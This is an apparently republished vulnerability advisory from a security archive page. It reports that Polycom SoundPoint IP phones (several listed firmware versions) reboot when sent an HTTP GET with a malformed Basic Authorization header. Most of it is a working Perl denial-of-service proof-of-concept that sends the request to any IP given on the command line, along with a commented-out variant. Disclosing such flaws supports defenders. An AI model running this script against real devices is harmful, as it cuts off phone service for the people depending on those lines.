扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
Source:http://packetstormsecurity.org/files/view/97948/polycomsoundpoint-dos.txt Hello, Polycom SoundPoint IP devices (IP phones) are vulnerable to Denial of Service attacks. Sending HTTP GET request with broken Authorization header effect a device restart after ~60 seconds. It was tested on: SoundPoint IP 335 (Version: 3.2.4.1734) SoundPoint IP 430 (Version: 3.2.3.1734) SoundPoint IP 450 (Version: 4.2.2.0710) Proof Of Concept: ----------------------------------------- #!/usr/bin/perl use IO::Socket; use strict; use warnings; if (!$ARGV[0]) { print "Usage: $0 [IP]\n"; exit; } my $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ARGV[0]", PeerPort => "80") || die "Error $!"; print $socket "GET /reg_1.htm HTTP/1.1\r\nAuthorization: Basic\r\n\r\n"; #print $socket "GET /reg_1.htm HTTP/1.1\r\nAuthorization: Basic \0\r\n\r\n"; ----------------------------------------- -- best regards pawel gawinek |
体验盒子
